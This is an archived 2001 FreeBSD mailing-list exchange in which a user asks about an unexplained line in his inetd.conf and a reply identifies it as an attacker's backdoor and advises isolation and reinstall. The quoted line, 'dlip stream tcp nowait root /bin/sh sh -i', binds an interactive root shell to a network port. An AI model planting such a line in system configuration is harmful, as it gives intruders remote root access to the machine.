Date: Tue, 31 Jul 2001 17:52:53 -0400 (EDT) From: Jeff Palmer <scorpio@drkshdw.org> To: Hayden Katzenellenbogen <haydenk@nextlevelinternet.com> Cc: <freebsd-stable@freebsd.org> Subject: Re: Extra Line in my inetd.conf Message-ID: <20010731174952.B5845-100000@jeff.isni.net> In-Reply-To: <NFBBKLNOALGIGCIMHGKFGEPOCCAA.haydenk@nextlevelinternet.com>
next in thread | previous in thread | raw e-mail | index | archive | help
You have been hacked. this line simply opens up a shell (/bin/sh) in interactive mode (-i) on the port "dlip" as specified in your /etc/services file. (typically 7201) I'd advise taking that machine OFF the network, and perform an audit. Refer to online documentation on how to diagnose, analyze, and cure the exploit the attacker used to penetrate your system. Then apply that knowledge to the newly FORMATted machine. (Yes, I recommend a full format/reinstall of the OS) Jeff Palmer scorpio@drkshdw.org On Tue, 31 Jul 2001, Hayden Katzenellenbogen wrote: > I have noticed this line at the bottom of some of my inetd.conf files on a > few of my machines.. it is though not commented out I have commented it out > as well I have no idea what it does... > > any one care to shed some light on this? > > > > #dlip stream tcp nowait root /bin/sh sh -i > > > Thanks > Hayden > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-stable" in the body of the message > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-stable" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20010731174952.B5845-100000>